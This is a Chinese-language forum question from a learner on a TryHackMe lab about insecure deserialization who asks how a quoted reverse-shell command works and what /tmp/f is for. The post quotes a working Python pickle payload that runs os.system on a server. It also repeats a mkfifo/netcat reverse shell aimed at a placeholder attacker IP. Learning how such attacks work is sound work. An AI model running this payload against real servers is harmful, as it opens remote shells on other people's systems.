如何解决这个反向shell命令是如何工作的?
昨天我在 TryHackMe 上了解了不安全反序列化 - 10 大 Web 应用程序安全风险 (Owasp) 之一(您可以访问课程 here。当我到达“代码执行”部分时,课程问我复制以下源代码并执行以获取基于 cookie 的有效负载:
import pickle
import sys
import base64
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'
class rce(object):
def __reduce__(self):
import os
return (os.system,(command,))
print(base64.b64encode(pickle.dumps(rce())))
我已经知道这段代码是反序列化类 rce 以注入 Web 客户端的 cookie 存储,然后在转发到服务器后,我可以使用 netcat 侦听它并执行 rce 工作。但我不明白以下核心反向 shell 是如何工作的:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f
有没有人给我一个清楚的解释?顺便说一下,我想知道这个反向shell中目录/tmp/f的用途!
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。